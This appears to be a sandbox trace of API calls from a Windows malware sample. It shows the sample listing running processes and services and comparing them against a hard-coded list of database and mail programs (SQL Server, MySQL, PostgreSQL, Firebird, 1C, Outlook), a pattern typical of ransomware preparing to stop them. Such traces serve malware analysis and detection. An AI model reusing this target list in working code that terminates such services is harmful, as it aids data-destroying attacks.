	[0168.272] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0168.272] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0168.272] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0168.272] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0168.272] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7ba6360 | out: hHeap=0x7ab0000) returned 1
	[0168.272] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3d0
	[0168.274] Process32FirstW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0168.274] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x52, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0168.275] lstrlenW (lpString="System") returned 6
	[0168.275] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0168.275] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0168.275] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0168.275] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0168.275] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0168.275] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0168.275] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0168.275] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0168.275] lstrlenW (lpString="smss.exe") returned 8
	[0168.275] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0168.275] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0168.275] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0168.275] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0168.275] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0168.275] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0168.275] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0168.275] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0168.276] lstrlenW (lpString="csrss.exe") returned 9
	[0168.276] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0168.276] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0168.276] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0168.276] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0168.276] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0168.276] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0168.276] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0168.276] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0168.276] lstrlenW (lpString="wininit.exe") returned 11
	[0168.276] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0168.276] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0168.276] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0168.276] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0168.276] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0168.276] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0168.277] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0168.277] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0168.277] lstrlenW (lpString="csrss.exe") returned 9
	[0168.277] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0168.277] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0168.277] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0168.277] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0168.277] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0168.277] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0168.277] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0168.278] lstrlenW (lpString="winlogon.exe") returned 12
	[0168.278] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0168.278] lstrlenW (lpString="services.exe") returned 12
	[0168.278] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0168.278] lstrlenW (lpString="lsass.exe") returned 9
	[0168.278] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0168.279] lstrlenW (lpString="lsm.exe") returned 7
	[0168.279] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0168.279] lstrlenW (lpString="svchost.exe") returned 11
	[0168.279] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0168.279] lstrlenW (lpString="svchost.exe") returned 11
	[0168.279] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0168.280] lstrlenW (lpString="svchost.exe") returned 11
	[0168.280] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0168.280] lstrlenW (lpString="svchost.exe") returned 11
	[0168.280] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2d, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0168.281] lstrlenW (lpString="svchost.exe") returned 11
	[0168.281] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0168.281] lstrlenW (lpString="audiodg.exe") returned 11
	[0168.281] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0168.281] lstrlenW (lpString="svchost.exe") returned 11
	[0168.281] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0168.282] lstrlenW (lpString="svchost.exe") returned 11
	[0168.282] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0168.282] lstrlenW (lpString="spoolsv.exe") returned 11
	[0168.282] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0168.282] lstrlenW (lpString="svchost.exe") returned 11
	[0168.282] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0168.283] lstrlenW (lpString="taskhost.exe") returned 12
	[0168.283] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0168.283] lstrlenW (lpString="dwm.exe") returned 7
	[0168.283] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0168.283] lstrlenW (lpString="explorer.exe") returned 12
	[0168.283] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0168.284] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0168.284] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0168.284] lstrlenW (lpString="reader_sl.exe") returned 13
	[0168.284] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x608, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0168.284] lstrlenW (lpString="taskhost.exe") returned 12
	[0168.284] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0168.285] lstrlenW (lpString="dllhost.exe") returned 11
	[0168.285] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0168.285] lstrlenW (lpString="dllhost.exe") returned 11
	[0168.285] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="rundll32.exe")) returned 1
	[0168.285] lstrlenW (lpString="rundll32.exe") returned 12
	[0168.285] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="dinotify.exe")) returned 1
	[0168.286] lstrlenW (lpString="dinotify.exe") returned 12
	[0168.286] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0168.286] lstrlenW (lpString="dllhost.exe") returned 11
	[0168.286] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0
	[0168.286] CloseHandle (hObject=0x3d0) returned 1
	[0168.286] Sleep (dwMilliseconds=0x1f4) 
	[0168.834] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb616c60
	[0168.834] EnumServicesStatusExW (in: hSCManager=0xb616c60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0168.834] GetLastError () returned 0xea
	[0168.834] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x11e4) returned 0x7ba6360
	[0168.834] EnumServicesStatusExW (in: hSCManager=0xb616c60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x7ba6360, cbBufSize=0x11e4, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x7ba6360, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0168.835] CloseServiceHandle (hSCObject=0xb616c60) returned 1
	[0168.835] lstrlenW (lpString="Appinfo") returned 7
	[0168.835] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0168.835] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0168.835] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0168.835] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0168.835] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0168.835] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0168.835] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0168.835] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0168.835] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0168.835] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0168.836] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0168.836] lstrlenW (lpString="AudioSrv") returned 8
	[0168.836] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0168.836] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0168.836] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0168.836] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0168.836] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0168.836] lstrlenW (lpString="BFE") returned 3
	[0168.836] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0168.836] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0168.836] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0168.836] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0168.836] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0168.836] lstrlenW (lpString="CryptSvc") returned 8
	[0168.836] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0168.836] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0168.836] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0168.836] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0168.836] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0168.836] lstrlenW (lpString="CscService") returned 10
	[0168.836] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0168.836] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0168.836] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0168.836] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0168.836] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0168.836] lstrlenW (lpString="DcomLaunch") returned 10
	[0168.836] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0168.836] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0168.836] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0168.836] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0168.836] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0168.836] lstrlenW (lpString="Dhcp") returned 4
	[0168.836] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0168.836] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0168.837] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0168.837] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0168.837] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0168.837] lstrlenW (lpString="Dnscache") returned 8
	[0168.837] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0168.837] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0168.837] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0168.837] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0168.837] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0168.837] lstrlenW (lpString="DPS") returned 3
	[0168.837] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0168.837] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0168.837] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0168.837] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0168.837] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0168.837] lstrlenW (lpString="eventlog") returned 8
	[0168.837] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0168.837] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0168.837] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0168.837] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0168.837] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0168.837] lstrlenW (lpString="EventSystem") returned 11
	[0168.837] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0168.837] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0168.837] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0168.837] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0168.837] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0168.837] lstrlenW (lpString="gpsvc") returned 5
	[0168.837] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0168.837] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0168.837] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0168.837] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0168.837] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0168.837] lstrlenW (lpString="iphlpsvc") returned 8
	[0168.838] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0168.838] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0168.838] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0168.838] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0168.838] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0168.838] lstrlenW (lpString="LanmanServer") returned 12
	[0168.838] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0168.838] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0168.838] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0168.838] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0168.838] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0168.838] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0168.838] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0168.838] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0168.838] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0168.838] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0168.838] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0168.838] lstrlenW (lpString="lmhosts") returned 7
	[0168.838] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0168.838] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0168.838] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0168.838] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0168.838] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0168.838] lstrlenW (lpString="MMCSS") returned 5
	[0168.838] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0168.838] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0168.838] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0168.838] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0168.838] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0168.838] lstrlenW (lpString="MpsSvc") returned 6
	[0168.838] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0168.838] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0168.838] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0168.838] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0168.839] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0168.839] lstrlenW (lpString="Netman") returned 6
	[0168.839] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0168.839] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0168.839] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0168.839] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0168.839] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0168.839] lstrlenW (lpString="netprofm") returned 8
	[0168.839] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0168.839] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0168.839] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0168.839] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0168.839] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
